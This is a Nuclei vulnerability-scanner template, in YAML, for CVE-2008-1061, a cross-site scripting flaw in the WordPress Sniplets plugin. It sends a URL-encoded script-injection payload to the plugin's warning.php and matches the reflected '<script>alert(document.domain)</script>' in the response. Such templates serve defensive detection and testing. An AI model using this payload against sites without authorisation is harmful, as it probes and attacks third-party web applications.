nuclei-templates/cves/2008/CVE-2008-1061.yaml

38 lines
1.4 KiB
YAML
Raw Normal View History

id: CVE-2008-1061
info:
2022-08-10 07:27:35 +00:00
name: Wordpress Plugin Sniplets 1.2.2 - Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: |
Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php; the (2) url parameter to (e) view/admin/submenu.php; and the (3) page parameter to (f) view/admin/pager.php.
reference:
- https://www.exploit-db.com/exploits/5194
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
- https://nvd.nist.gov/vuln/detail/CVE-2008-1061
- http://secunia.com/advisories/29099
classification:
cve-id: CVE-2008-1061
tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200